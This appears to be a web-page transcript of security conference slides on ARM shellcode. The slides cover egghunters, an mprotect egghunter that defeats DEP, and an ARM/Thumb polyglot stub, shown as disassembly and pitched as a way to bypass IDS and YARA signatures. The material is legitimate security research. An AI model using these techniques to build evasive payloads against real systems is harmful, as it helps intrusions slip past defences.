The Seven Axioms of Security - ITWeb 2017
The Seven Axioms of Security - ITWeb 2017The Seven Axioms of Security - ITWeb 2017
The Seven Axioms of Security - ITWeb 2017
Saumil Shah
 
Redefining Defense - HITB2017AMS Keynote
Redefining Defense - HITB2017AMS KeynoteRedefining Defense - HITB2017AMS Keynote
Redefining Defense - HITB2017AMS Keynote
Saumil Shah
 

Más de Saumil Shah (20)

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
 
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation WorkshopHack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
 
Cross Border Cyber Attacks: Impact on Digital Sovereignty
Cross Border Cyber Attacks: Impact on Digital SovereigntyCross Border Cyber Attacks: Impact on Digital Sovereignty
Cross Border Cyber Attacks: Impact on Digital Sovereignty
 
The Seven Axioms of Security - ITWeb 2017
The Seven Axioms of Security - ITWeb 2017The Seven Axioms of Security - ITWeb 2017
The Seven Axioms of Security - ITWeb 2017
 
Redefining Defense - HITB2017AMS Keynote
Redefining Defense - HITB2017AMS KeynoteRedefining Defense - HITB2017AMS Keynote
Redefining Defense - HITB2017AMS Keynote
 

Último

Malibou Pitch Deck For Its €3M Seed Round
Malibou Pitch Deck For Its €3M Seed RoundMalibou Pitch Deck For Its €3M Seed Round
Malibou Pitch Deck For Its €3M Seed Round
sjcobrien
 
Safelyio Toolbox Talk Softwate & App (How To Digitize Safety Meetings)
Safelyio Toolbox Talk Softwate & App (How To Digitize Safety Meetings)Safelyio Toolbox Talk Softwate & App (How To Digitize Safety Meetings)
Safelyio Toolbox Talk Softwate & App (How To Digitize Safety Meetings)
safelyiotech
 
Fundamentals of Programming and Language Processors
Fundamentals of Programming and Language ProcessorsFundamentals of Programming and Language Processors
Fundamentals of Programming and Language Processors
Rakesh Kumar R
 
The Key to Digital Success_ A Comprehensive Guide to Continuous Testing Integ...
The Key to Digital Success_ A Comprehensive Guide to Continuous Testing Integ...The Key to Digital Success_ A Comprehensive Guide to Continuous Testing Integ...
The Key to Digital Success_ A Comprehensive Guide to Continuous Testing Integ...
kalichargn70th171
 
How to write a program in any programming language
How to write a program in any programming languageHow to write a program in any programming language
How to write a program in any programming language
Rakesh Kumar R
 
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, FactsALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
Green Software Development
 
如何办理(hull学位证书)英国赫尔大学毕业证硕士文凭原版一模一样
如何办理(hull学位证书)英国赫尔大学毕业证硕士文凭原版一模一样如何办理(hull学位证书)英国赫尔大学毕业证硕士文凭原版一模一样
如何办理(hull学位证书)英国赫尔大学毕业证硕士文凭原版一模一样
gapen1
 
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
XfilesPro
 
Modelling Up - DDDEurope 2024 - Amsterdam
Modelling Up - DDDEurope 2024 - AmsterdamModelling Up - DDDEurope 2024 - Amsterdam
Modelling Up - DDDEurope 2024 - Amsterdam
Alberto Brandolini
 
8 Best Automated Android App Testing Tool and Framework in 2024.pdf
8 Best Automated Android App Testing Tool and Framework in 2024.pdf8 Best Automated Android App Testing Tool and Framework in 2024.pdf
8 Best Automated Android App Testing Tool and Framework in 2024.pdf
kalichargn70th171
 
How Can Hiring A Mobile App Development Company Help Your Business Grow?
How Can Hiring A Mobile App Development Company Help Your Business Grow?How Can Hiring A Mobile App Development Company Help Your Business Grow?
How Can Hiring A Mobile App Development Company Help Your Business Grow?
ToXSL Technologies
 
Oracle Database 19c New Features for DBAs and Developers.pptx
Oracle Database 19c New Features for DBAs and Developers.pptxOracle Database 19c New Features for DBAs and Developers.pptx
Oracle Database 19c New Features for DBAs and Developers.pptx
Remote DBA Services
 
Hand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User Validation Code KataHand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User Validation Code Kata
Philip Schwarz
 
Project Management: The Role of Project Dashboards.pdf
Project Management: The Role of Project Dashboards.pdfProject Management: The Role of Project Dashboards.pdf
Project Management: The Role of Project Dashboards.pdf
Karya Keeper
 
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
dakas1
 
Preparing Non - Technical Founders for Engaging a Tech Agency
Preparing Non - Technical Founders for Engaging a Tech AgencyPreparing Non - Technical Founders for Engaging a Tech Agency
Preparing Non - Technical Founders for Engaging a Tech Agency
ISH Technologies
 
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdfTop Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
VALiNTRY360
 
Microservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we workMicroservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we work
Sven Peters
 
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
mz5nrf0n
 
Liberarsi dai framework con i Web Component.pptx
Liberarsi dai framework con i Web Component.pptxLiberarsi dai framework con i Web Component.pptx
Liberarsi dai framework con i Web Component.pptx
Massimo Artizzu
 

Último (20)

Malibou Pitch Deck For Its €3M Seed Round
Malibou Pitch Deck For Its €3M Seed RoundMalibou Pitch Deck For Its €3M Seed Round
Malibou Pitch Deck For Its €3M Seed Round
 
Safelyio Toolbox Talk Softwate & App (How To Digitize Safety Meetings)
Safelyio Toolbox Talk Softwate & App (How To Digitize Safety Meetings)Safelyio Toolbox Talk Softwate & App (How To Digitize Safety Meetings)
Safelyio Toolbox Talk Softwate & App (How To Digitize Safety Meetings)
 
Fundamentals of Programming and Language Processors
Fundamentals of Programming and Language ProcessorsFundamentals of Programming and Language Processors
Fundamentals of Programming and Language Processors
 
The Key to Digital Success_ A Comprehensive Guide to Continuous Testing Integ...
The Key to Digital Success_ A Comprehensive Guide to Continuous Testing Integ...The Key to Digital Success_ A Comprehensive Guide to Continuous Testing Integ...
The Key to Digital Success_ A Comprehensive Guide to Continuous Testing Integ...
 
How to write a program in any programming language
How to write a program in any programming languageHow to write a program in any programming language
How to write a program in any programming language
 
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, FactsALGIT - Assembly Line for Green IT - Numbers, Data, Facts
ALGIT - Assembly Line for Green IT - Numbers, Data, Facts
 
如何办理(hull学位证书)英国赫尔大学毕业证硕士文凭原版一模一样
如何办理(hull学位证书)英国赫尔大学毕业证硕士文凭原版一模一样如何办理(hull学位证书)英国赫尔大学毕业证硕士文凭原版一模一样
如何办理(hull学位证书)英国赫尔大学毕业证硕士文凭原版一模一样
 
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
 
Modelling Up - DDDEurope 2024 - Amsterdam
Modelling Up - DDDEurope 2024 - AmsterdamModelling Up - DDDEurope 2024 - Amsterdam
Modelling Up - DDDEurope 2024 - Amsterdam
 
8 Best Automated Android App Testing Tool and Framework in 2024.pdf
8 Best Automated Android App Testing Tool and Framework in 2024.pdf8 Best Automated Android App Testing Tool and Framework in 2024.pdf
8 Best Automated Android App Testing Tool and Framework in 2024.pdf
 
How Can Hiring A Mobile App Development Company Help Your Business Grow?
How Can Hiring A Mobile App Development Company Help Your Business Grow?How Can Hiring A Mobile App Development Company Help Your Business Grow?
How Can Hiring A Mobile App Development Company Help Your Business Grow?
 
Oracle Database 19c New Features for DBAs and Developers.pptx
Oracle Database 19c New Features for DBAs and Developers.pptxOracle Database 19c New Features for DBAs and Developers.pptx
Oracle Database 19c New Features for DBAs and Developers.pptx
 
Hand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User Validation Code KataHand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User Validation Code Kata
 
Project Management: The Role of Project Dashboards.pdf
Project Management: The Role of Project Dashboards.pdfProject Management: The Role of Project Dashboards.pdf
Project Management: The Role of Project Dashboards.pdf
 
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
 
Preparing Non - Technical Founders for Engaging a Tech Agency
Preparing Non - Technical Founders for Engaging a Tech AgencyPreparing Non - Technical Founders for Engaging a Tech Agency
Preparing Non - Technical Founders for Engaging a Tech Agency
 
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdfTop Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
 
Microservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we workMicroservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we work
 
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
 
Liberarsi dai framework con i Web Component.pptx
Liberarsi dai framework con i Web Component.pptxLiberarsi dai framework con i Web Component.pptx
Liberarsi dai framework con i Web Component.pptx
 

Make ARM Shellcode Great Again

  • 1. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON Make ARM Shellcode Great Again Saumil Shah @therealsaumil 13 September 2018
  • 2. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON # who am i CEO Net-square. • Hacker, Speaker, Trainer, Author. • M.S. Computer Science Purdue University. • LinkedIn: saumilshah • Twitter: @therealsaumil
  • 3. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON Agenda • A background on ARM shellcode • My research around ARM shellcode – cache coherency (solved before) – space limitations – polyglot tricks • Demos
  • 4. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON Shellcode in tight spaces • Egghunter: • Searches for an EGG (4+4 byte value) in the process memory. • Uses syscalls to determine whether a memory page exists or not (safely). • Upon finding it, Egghunter transfers the control to the code following the egg. • Nothing new here - done before.
  • 5. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON Egghunter - Common Problems • DEP • If Egg+shellcode is in a different memory region, then it may not be executable • e.g. Stack overflow, shellcode in the heap. • ROP chains? • Enter the mprotect egghunter!
  • 6. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON mprotect Egghunter heap stack Lib Lib Binary shellcodeHACKHACK overflow ROP mprotect egghunter RWX RWX RWX RWX RWX RWX RWX RWX gef> vmmap Start End Perm Path 0x00008000 0x00009000 rwx /home/pi/eggbreak 0x00010000 0x00011000 rwx /home/pi/eggbreak 0x00011000 0x00012000 rwx [heap] 0x00012000 0x00032000 rw- [heap] 0xb6e9c000 0xb6fbe000 r-x /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fbe000 0xb6fc5000 --- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc5000 0xb6fc7000 r-- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc7000 0xb6fc8000 rw- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc8000 0xb6fcb000 rw- 0xb6fd8000 0xb6ff5000 r-x /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffa000 0xb6ffd000 rw- 0xb6ffd000 0xb6ffe000 r-- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffe000 0xb6fff000 rw- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6fff000 0xb7000000 r-x [sigpage] 0xbefdf000 0xbeffe000 rw- 0xbeffe000 0xbf000000 rwx [stack]
  • 7. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON DEMO mprotect egghunter
  • 8. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON ARM Shellcode Polyglot Tricks • Common trick in ARM shellcode is to switch to Thumb mode at the beginning. • The "I can signature this" debate. – YARA Rules, IDS, Bro, blah blah… • What if our target is a Thumb-only processor? – example: Cortex-M • One Shellcode To Run Them All
  • 9. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON "Quantum Leap" Shellcode Start in THUMB modeStart in ARM mode THUMB shellcode (execve, reverse, …) THUMB shellcode (execve, reverse, …) "LEAP" TO THUMB PASS THROUGH PASS THROUGH PASS THROUGH Quantum Leap Same Same But Different
  • 10. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON "Quantum Leap" - what we need • An understanding of ARM and Thumb encoding: – ARM instruction: "DO SOMETHING" – 2 THUMB instructions: "PASS THROUGH" • Conditional Execution in ARM instructions – very helpful! • A little bit of luck and perseverance. • Nomenclature Credit: "dialup".
  • 11. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON Simple ARM to Thumb switch • Avoid Branches, Load/Store, Floating Point, etc. • Should work on ARMv6. – avoid Thumb2 instructions • Avoid Illegal instructions. 0: e28f1001 add r1, pc, #1 4: e12fff11 bx r1 8: 270b movs r7, #11 a: beff bkpt 0x00ff 0: 1001 asrs r1, r0, #32 2: e28f b.n 524 4: ff11 e12f vrhadd.u16 d14,d1,d31 8: 270b movs r7, #11 a: beff bkpt 0x00ff ORIGINAL ARM CODE "THUMB VIEW"
  • 12. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON ARM and THUMB decoding - 1 e28f1001: 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1 4 BYTE ARM INSTRUCTION: conditional opcodestatus operand 1 destination operand 2 Thumb instruction 2 Thumb instruction 1 • Controlled by opcode and conditional flags. • Partially influenced by the first operand. • Trickier to control. • Controlled by Operands of the ARM instruciton. • Easier to control. im m ediate
  • 13. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON ARM and THUMB decoding - 1 e28f1001: 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1 1001: 0001 0000 0000 0001 asrs r1,r0,#32 e28f: 1110 0010 1000 1111 b 524 1 ARM INSTRUCTION RESULTING INTO 2 THUMB INSTRUCTIONS: conditional opcodestatus operand 1 destination operand 2 im m ediate Branch instructions are destructive Thumb Opcode influenced by ARM conditional bits
  • 14. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON (Un)conditional Instructions • How can we turn an ARM instruction into a conditional instruction… • …with guaranteed execution everytime? • COMPLIMENTARY CONDITIONS. • One of the instructions is guaranteed to execute, irrespective of condition flags. e28f1001 add r1, pc, #1 128f1005 addne r1, pc, #5 028f1001 addeq r1, pc, #1 UNCONDITIONAL INSTRUCTION COMPLIMENTARY CONDITIONS
  • 15. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON ARM and THUMB decoding - 2 128f1005: 0001 0010 1000 1111 0001 0000 0000 0101 addne r1,pc,#5 1005: 0001 0000 0000 0101 asrs r5,r0,#32 128f: 0001 0010 1000 1111 asrs r7,r1,#10 028f1001: 0000 0010 1000 1111 0001 0000 0000 0001 addeq r1,pc,#1 1001: 0001 0000 0000 0001 asrs r1,r0,#32 028f: 0000 0010 1000 1111 lsls r7,r1,#10 USING CONDITIONAL ARM INSTRUCTIONS: conditional opcodestatus operand 1 destination operand 2 im m ediate No destructive instructions in Thumb mode Complimentary Conditional ARM instructions
  • 16. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON Final "Quantum Leap" Code 0: 228fa019 addcs sl, pc, #25 4: 328fa015 addcc sl, pc, #21 8: 21a0400d movcs r4, sp c: 31a0400d movcc r4, sp 10: 292d0412 pushcs {r1, r4, sl} 14: 392d0412 pushcc {r1, r4, sl} 18: 28bda002 popcs {r1, sp, pc} 1c: 38bda002 popcc {r1, sp, pc} 20: beff bkpt 0x00ff 22: beff bkpt 0x00ff 0: a019 add r0, pc, #100 2: 228f movs r2, #143 4: a015 add r0, pc, #84 6: 328f adds r2, #143 8: 400d ands r5, r1 a: 21a0 movs r1, #160 c: 400d ands r5, r1 e: 31a0 adds r1, #160 10: 0412 lsls r2, r2, #16 12: 292d cmp r1, #45 14: 0412 lsls r2, r2, #16 16: 392d subs r1, #45 18: a002 add r0, pc, #8 1a: 28bd cmp r0, #189 1c: a002 add r0, pc, #8 1e: 38bd subs r0, #189 20: beff bkpt 0x00ff 20: beff bkpt 0x00ff QUANTUM LEAP: ARM TO THUMB QUANTUM LEAP: THUMB TO THUMB
  • 17. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON Assembling the Quantum Leap • No Thumb2 instructions. • No NULL bytes. • Many iterations. • bx sl implemented by push {sl}, pop {pc}. • Register list proved to be a challenge. • Registers r4, sl altered (in ARM). • Registers r0, r1, r2, r3 altered (in Thumb).
  • 18. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON DEMO Quantum Leap Shellcode
  • 19. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON Conclusion • ARM/Thumb Polyglot instructions and conditional execution offer many opportunities for obfuscation and signature bypass. • Lots of exploration opportunities in ARM shellcoding. https://github.com/therealsaumil/arm_shellcode
  • 20. NETSQUARE (c) SAUMIL SHAH44CON 2018 LONDON exit() Saumil Shah @therealsaumil #44CON 2018